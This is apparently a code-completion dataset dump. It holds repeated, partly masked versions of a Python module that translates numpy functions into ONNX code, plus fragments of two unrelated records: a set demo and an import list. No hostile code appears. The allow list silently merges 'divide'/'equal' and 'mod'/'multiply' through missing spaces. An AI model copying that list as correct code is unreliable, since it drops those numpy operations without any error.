get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-3": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. 
The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. 
Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-4": "<mask token>\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. 
The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. 
Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-5": "\"\"\"\n@file\n@brief One class which visits a syntax tree.\n\"\"\"\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp,\n 'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}\n allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'\n 'equal exp floor greater invert less log matmul maximum minimum mod'\n 'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array,\n 'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,\n 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed\n from skl2onnx.algebra.complex_functions import onnx_cdist # delayed\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError: # pragma: no cover\n # Too old version for skl2onnx.\n pass\n\n from skl2onnx.algebra import onnx_ops # delayed\n from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith(\"Onnx\") and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError( # pragma: no cover\n f\"Issue with {k}={v} (type={type(v)})\") from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False,\n context_cpl=None, output_names=None,\n dtype=numpy.float32,\n verbose=0, 
fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. 
The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {} # pragma: no cover\n try:\n obj = compile(code, \"\", \"exec\")\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(f\"Unable to compile\\n{code}\") from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l) # pylint: disable=W0122\n return context_l[name]\n\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError( # pragma: no cover\n f\"Unable to guess code from type {type(fct)}.\")\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context,\n output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None: # pragma: no cover\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
s1 = {10, 20, 30, 60, 70, 80, 90}
s2 = set()
print(s2)
s1.add(100)
print(s1.pop())
print(10 in s1)
print(10 not in s1)
|
normal
|
{
"blob_id": "3747e45dcba548060f25bd6d6f0e0e96091ca3df",
"index": 2358,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(s2)\ns1.add(100)\nprint(s1.pop())\nprint(10 in s1)\nprint(10 not in s1)\n",
"step-3": "s1 = {10, 20, 30, 60, 70, 80, 90}\ns2 = set()\nprint(s2)\ns1.add(100)\nprint(s1.pop())\nprint(10 in s1)\nprint(10 not in s1)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import json
from jsonargparse import ArgumentParser, ActionConfigFile
import yaml
from typing import List, Dict
import glob
import os
import pathlib
import pdb
import subprocess
import copy
from io import StringIO
from collections import defaultdict
import torch
from spacy.tokenizer import Tokenizer
from spacy.lang.en import English
